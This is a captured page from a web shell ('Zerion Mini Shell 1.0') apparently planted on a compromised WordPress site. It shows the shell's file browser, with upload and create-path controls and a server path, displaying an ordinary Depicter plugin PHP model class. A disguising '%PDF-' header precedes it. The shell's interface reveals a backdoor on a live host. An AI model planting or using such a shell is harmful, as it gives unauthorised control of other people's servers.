%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/eirtvhdf/vmullen.hire-va.com/wp-content/plugins/depicter/app/src/Database/Entity/
Upload File :
Create Path :
Current File : //home/eirtvhdf/vmullen.hire-va.com/wp-content/plugins/depicter/app/src/Database/Entity/Meta.php

<?php
namespace Depicter\Database\Entity;

use Averta\WordPress\Database\Entity\Model;

class Meta extends Model
{
	/**
	 * Resource name.
	 *
	 * @var string
	 */
	protected $resource = 'depicter_meta';

	/**
	 * Determines what fields can be saved without be explicitly.
	 *
	 * @var array
	 */
	protected $builtin = [ 'relation',
		'relation_id',
		'meta_key',
		'meta_value' ];

	protected $guard = [ 'id' ];
}

Zerion Mini Shell 1.0